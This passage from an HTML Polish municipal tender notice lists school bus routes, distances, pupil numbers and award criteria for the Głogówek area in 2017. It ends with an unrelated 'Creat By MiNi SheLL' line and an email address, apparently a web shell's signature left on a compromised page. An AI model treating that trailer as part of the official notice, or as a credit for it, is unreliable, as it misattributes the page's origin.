II-Głogówek GNr1- Stare Kotkowice- BiedrzychowiceSP/OP- Zwiastowice- Twardawa	24 km.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 60.11.31.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2017.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Rok produkcji pojazdu - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zadanie Nr 2 realizowane autobusem na  30  miejsc siedzących Głogówek- Wróblin- Stare Kotkowice- Głogówek GNr 1
Głogówek- Nowe Kotkowice- Chudoba- Głogówek -SP Nr 1/G Nr 1.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie realizowane autobusem na  30  miejsc siedzących
Trasa  - kurs ranny - 28 km 
I-Głogówek -  Wróblin - Stare Kotkowice -Głogówek GNr1		18 km
liczba uczniów:   do G Nr 1 - 25 uczniów
		     do Ośrodka Szk-Wych - 1 uczniów
		     do OP w SP Nr1 - 1 dziecko
II- Głogówek- Nowe Kotkowice- Chudoba-/ SP Nr1/GNr1					10 km
liczba uczniów:   do G Nr1 -  5 uczniów
		    	     do SP Nr1 - 5 uczniów
Trasa  - kurs popołudniowy- 28 km  
I -Głogówek GNr1/SPNr1- Chudoba-  Nowe Kotkowice-  Głogówek				10 km
II-Głogówek GNr1-Stare Kotkowice- Wróblin-  Głogówek		 				18 km.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 60.11.31.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2017.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Rok produkcji pojazdu - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Zadanie Nr 3	realizowane autobusem na 42  miejsca  siedzące Trasa: Głogówek-Wierzch- Mionów- Błażejowice- Mochów- Głogówek GNr1
Głogówek - Błażejowice - Mionów- Wierzch- Mochów skrzyżowanie - Głogówek SPNr1.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie realizowane autobusem na 42  miejsca  siedzące
Trasa  - kurs ranny - 36 km 
I-Głogówek -  Wierzch - Mionów - Błażejowice - Mochów -  Głogówek GNr1				18 km
liczba uczniów:   do G Nr 1 -  32 uczniów
		    do Ośrodka Szk-Wych - 1 uczeń
II- Głogówek- Błażejowice - Mionów- Wierzch- Mochów skrz- Głogówek SPNr1			18 km
liczba uczniów:  do SPNr 1 - 36 uczniów
		 	   do OP Nr1 - 5 dzieci
Trasa  - kurs popołudniowy- 36 km  
I -Głogówek GNr1/SPNr1- Mochów- Błażejowice- Mionów- Wierzch- Głogówek			18 km
II-Głogówek GNr1/SPNr1- Mochów- Błażejowice- Mionów- Wierzch- Głogówek			18 km.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 60.11.31.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2017.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Rok produkcji pojazdu - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Zadanie Nr 4	realizowane autobusem na 42 miejsc siedzących Trasa: Głogówek- Zawada But- Sysłów- Golczowice- Mucków- Zawada- Leśnik - Głogówek GNr1/SPNr1.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie realizowane autobusem na 42 miejsc siedzących
Trasa  - kurs ranny - 28 km 
Głogówek -  Zawada But - Sysłów - Golczowice- Mucków- Zawada- Leśnik - Głogówek GNr1/SPNr1			
liczba uczniów:   do G Nr 1 -  18 uczniów
  		    do SP Nr 1 -  19 uczniów
Trasa  - kurs popołudniowy- 54 km  
I - Głogówek GNr1/SPNr1 - Mochów- Leśnik -Zawada- Sysłów- Golczowice - Mucków - Głogówek											26 km
II-Głogówek GNr1/SPNr1- Mochów- Leśnik - Zawada- Sysłów- Golczowice - Mucków - Zawada -But - Głogówek          				28 km.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 60.11.31.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.07.2017.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Rok produkcji pojazdu - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Zadanie Nr 5	realizowane autobusem na 42  miejsc siedzących Trasa: Głogówek- Kierpień- Rzepcze - Głogówek SPNr1/GNr1.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie realizowane autobusem na 42  miejsc siedzących
Trasa  - kurs ranny - 15 km 
I- Głogówek -  Kierpień- Rzepcze - Głogówek GNr1/SPNr1						15 km		
liczba uczniów:  do G Nr 1 - 12 uczniów
  		    do SP Nr 1 - 27 uczniów
		    do Ośrodka Szk-Wych- 1 uczeń
Trasa  - kurs popołudniowy- 30 km  
I -Głogówek GNr1/SPNr1- Rzepcze- Kierpień- Głogówek						15 km
II-Głogówek GNr1/SPNr1- Rzepcze- Kierpień- Głogówek						15 km.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 60.11.31.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.07.2017.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Rok produkcji pojazdu - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Zadanie Nr 6	realizowane autobusem na  53  miejsc siedzących Trasa: Głogówek- Racławice Śl- Dzierżysławice- Mochów -GłogówekGNr1/SPNr1-	 Głogówek SPNr2- Głogowiec- Głogówek OP Oracze- Głogówek SPNr2  -GNr1.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie realizowane autobusem na  53  miejsc siedzących
Trasa  - kurs ranny - 32 km 
I- Głogówek -  Racławice Śl- Dzierżysławice- Mochów - Głogówek GNr1/SPNr1- Głogówek SPNr2- 	24 km
liczba uczniów:   do G Nr 1 - 8 uczniów
  		    do SP Nr 1 - 13.uczniów
		    do Ośrodka Szk-Wych- 6 uczniów
		    do SP Nr 2 - 25 uczniów
		    do PG - 1  uczeń
II- Głogówek SPNr2- Głogowiec-  Głogówek OP Oracze/ SPNr2- Głogówek GNr1/	                               8 km	
liczba uczniów:    do G Nr 1 -  2 uczniów
  		    do SP Nr 2 - 5 uczniów
		    do OP Oracze - 4 dzieci
    do Ośrodka Szk-Wych- 3 uczniów
Trasa  - kurs popołudniowy- 42 km  
I -Głogówek GNr1/SPNr1- Głogówek SPNr2 - Mochów - Dzierżysławice- Głogówek			           12 km
II-Głogówek SPNr1/GNr1- Głogówek SPNr2/OP Oracze- Głogowiec- Mochów - Dzierżysławice- Racławice Śl- Głogówek   		     			 30 km.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 60.11.31.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2017.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Rok produkcji pojazdu - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Zadanie Nr 7 realizowane autobusem na   42  miejsc siedzących Trasa: Głogówek- Ciesznów- Kazimierz- Góreczno - Tomice- Szonów SP- Klisino -  Racławice Śl. ZSz - Racławice Śl -  Kazimierz- Góreczno- Tomice -  Szonów SP/OP - Głogówek.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie realizowane autobusem na   42  miejsc siedzących
Trasa  - kurs ranny - 55 km 
I- Głogówek -  Cieszniów- Kazimierz- Góreczno- Tomice- Szonów SP/OP - Klisino - Racławice Śl ZSz  	        32 km
liczba uczniów:   do ZSz Racławice - 32 uczniów
  		     do SP Szonów - 13 uczniów
II- Racławice Śl ZSz- Kazimierz- Góreczno - Tomice -  Szonów SP/OP- Głogówek					23 km	
liczba uczniów:   do SP Szonów -  24 uczniów  		
		          do OP Szonów - 13 dzieci
Trasa  - kurs popołudniowy- 55 km  
I -Głogówek- SP Szonów - Kazimierz- Góreczno- Tomice - Racławice Śl	ZSz				             23 km
II- Racławice Śl ZSz-  Szonów SP/OP- Tomice- Góreczno- Kazimierz- Cieszniów- Głogówek   	              32 km.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 60.11.31.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2017.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Rok produkcji pojazdu - 10</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com